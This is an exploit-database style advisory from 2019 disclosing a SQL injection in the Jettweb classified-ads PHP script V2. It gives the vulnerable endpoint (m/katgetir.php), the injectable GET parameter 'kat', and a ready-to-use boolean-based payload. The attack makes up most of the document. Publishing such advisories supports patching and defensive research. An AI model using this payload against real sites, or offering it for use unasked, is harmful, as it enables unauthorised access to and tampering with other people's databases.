14 lines
No EOL
440 B
Text
14 lines
No EOL
440 B
Text
# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
|
||
# Date: 25.03.2019
|
||
# Exploit Author: Ahmet Ümit BAYRAM
|
||
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
|
||
# Demo Site: http://ilanv2.proemlaksitesi.net
|
||
# Version: V2
|
||
# Tested on: Kali Linux
|
||
# CVE: N/A
|
||
|
||
----- PoC : SQLi -----
|
||
|
||
Request: http://localhost/[PATH]/m/katgetir.php?kat=1
|
||
Vulnerable Parameter: kat (GET)
|
||
Payload: kat=1' OR NOT 1300=1300-- rwTf |